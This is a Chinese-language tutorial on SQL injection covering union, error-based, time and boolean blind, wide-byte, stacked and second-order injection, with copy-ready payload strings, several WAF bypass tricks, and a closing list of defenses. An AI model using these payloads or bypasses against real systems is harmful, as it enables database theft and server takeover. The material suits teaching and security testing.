sql注入

sql注入

先看几个已经发生的sql注入

 

漏洞原理

  web应用程序对用户输入数据的合法性没有判断或者过滤不严格,攻击者在程序事先定义好的sql语句结尾添加额外的sql语句,欺骗sql服务器执行非授权的任意查询,得到一些数据。

漏洞危害

  1. 脱库,通过批量查询的方式获取数据库中有用的信息。

  2. 查询管理员的账号、密码,从而利用管理员账号密码做更多的操作。

  3. 对数据增删改查,达到非法的目的。

  4. 如果有读写权限,也可以直接向服务器写木马文件,读取服务器中敏感文件,进一步进行提权,从而控制整个服务器。

漏洞利用

  1. union联合查询

  union用于合并两个或者多个select语句的结果集。通过将原有查询语句结果置为空,页面上就会回显union后的select语句的结果。

联合查询中需要得到原有查询语句的列数,最常用的两种方式

1. 使用order by 
?id=1' order by 3 --+
2. 使用union语句判断列数
?id=1' union select NULL,NULL,NULL --+
在Oracle中,每个查询语句都必须使用FROM关键字并指定一个有效的表,有一个DUAL表
?id=1' union select NULL,NULL from DUAL --

   使用union查询可利用的sql函数有:

mysql中
@@version #查询数据库版本
database() #查当前数据库
user() #用户
有3个常用的连接字符串函数:
concat(1,2) #将两个字符串连接在一起
concat_ws(#,1,2) #不同的字符串用#隔开
group_concat(1,2,3) #显示在同一行

  数据库中的默认库或者表

  mysql中有一个information_schema库,该库中有3张默认表:分别为:

  SCHEMATA、TABLES、COLUMNS

  2. 报错注入

  当页面没有回显信息,但是存在sql的报错语句时,我们就可以尝试使用报错注入,通过一些函数的使用,导致数据库执行出错,返回我们构造的查询语句的结果。

  常见的报错注入函数:

  floor():

floor:这个函数需要结合count(),rand(),group by()一起 来利用。
 ?name=luy' or (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand(0)*2))) --+  

  extractvalue()与updatexml:

  这两个称为xpath报错,都是对xml文档进行查询,updatexml可以进行查询替换。

extractvalue(xml文档,xml路径)  
updataxml(xml文档,xml路径,更新的xml内容)
都是在xml路径中植入我们的查询语句。其他参数的值可以随便写,执行报错会回显我们的查询语句结果。
 ?name=jjh' or extractvalue(1,concat(0x7e,(select database()),0x7e))--+  ?name=jjh' or updatexml(1,concat(0x3a,(select database()),0x7e),1)--+

  3. 盲注

  当页面不回显数据,也没有报错语句,只能通过页面返回的正常与否来判断我们的注入语句是否正确。就需要进行盲注。

  (1). 时间盲注

  当我们构造的正确sql语句和错误sql语句,回显都一样时,就考虑用时间盲注,通过页面的返回时间来判断我们构造sql语句的正确与否。

mysql中的延迟时间函数有:sleep(3)

?id=1' and if(left(database(),1)='s',sleep(3),0)

PostgreSQL的时间函数:pg_sleep(3)

sql server的时间函数:WAITFOR DELAY '0:0:3'

Oracle 的时间函数:dbms_pipe.receive_message('RDS', 10)

?id=-1 or 1= dbms_pipe.receive_message('RDS', 10)--

  (2). 布尔盲注

  利用一些截取字符串的函数来截取我们查询结果的字符串,从而确定我们查询结果的值是什么。因为我们查询的结果不回显,只能通过猜测来判断返回的值是什么。

left(string,n)   #n为截取的长度
?id=1' and left(database(),1)='p'
substr(string,start,length) #start为开始截取的位置,length为截取的长度
?id=1' and ascii(substr(database(),1,1)=112
regexp正则表达式
?id=1' and database() regexp '^p' #第一个字符是p
like
?id=1' and database() like 'p%' #第一个字符是p
if(判断条件,正确返回的值,错误返回的值)
?id=1' and 1=if(left(database(),1)='d',1,0)

  4. 宽字节注入

  后端使用了GBK编码,并且会对单引号,双引号进行转义,我们在构造exp时,需要在闭合字符(单双引号)的前面加上%df ,这样后端对闭合的单双引号转义时,转义的反斜杠会被编码为%5c,%5c与我们写入的%df会组成一个汉字,这样就绕过了对特殊字符的转义,从而正确闭合,执行我们的sql语句。

  5. 堆叠注入

  mysql中,通过分号来结束sql语句,这样就可以多条sql语句一起使用,攻击者就可以利用分号来结束原有sql语句,后面构造自己的sql语句,从而造成sql注入。

  6. Base64注入

  就是将提交的参数进行了base64编码,攻击者也可以将sql语句构造好之后进行编码,传入参数也能进行sql注入。

  7. 二次注入

  第一次往数据库中插入恶意数据,第二次查询插入的恶意数据,就会造成攻击。

漏洞存在位置

  1. cookie位置

  web应用程序可能会利用cookie来确定是否是已知用户,

http请求包中含有cookie字段
Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4
应用程序可能会利用sql查询来确定是否是正常用户。
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'
这时就有可能存在sql注入
exp: ' and '1'='1

   2. 提交的参数位置

  参数位置的sql注入比较常见,只要提交的参数拼接到sql语句中执行了,就有可能存在sql注入。

绕过方式

   1. 编码绕过:

  waf对单引号,双引号进行了过滤,我们可以将单双引号进行编码,再进行闭合,一次编码不行,也可以考虑二次编码进行绕过。常用的有url编码,unicode编码,base64,hex等。

  2. 大小写双写关键字绕过:

  部分waf值过滤全大写或者小写的关键字,我们可以大小写一起使用来绕过。

  3. 过滤了空格:

  可以使用+ 、注释符/**/ 、空白符来绕过。

  4. and和or进行了过滤:

  可以使用&& 、 || 代替 and 和 or 

  5. 内联注释绕过:

  将关键字包裹在多行注释里面,/*!50002sleep(3)*/

  6. 异常method绕过:

  有些waf只检测GET、POST方法,我们可以修改请求方式为DigApis,有可能会绕过waf的检测。

  7. 复参数绕过:

  在提交的参数中给同一个参数多次赋值,部分waf只会检测第一个参数的值,而后端程序处理时可能取后面参数的值,从而进行绕过。

  8. 在关键字中添加%绕过:

  如果对关键字进行检测,我们可以在关键字中添加多个%,绕过waf的检测。

漏洞防御

  1. 对关键字和特殊符号进行过滤。

  2. 对sql语句进行预编译,使用户输入的值只当做参数来传入,不会作为sql命令来执行。

  3. 将用户的输入转义后再组成sql语句。

  4. 统一错误信息,关闭错误提示。

  5. 限制用户输入的长度。

 

上一篇:Java数据导出(写)Excel文件 解析


下一篇:【MySQL】使用event的具体案例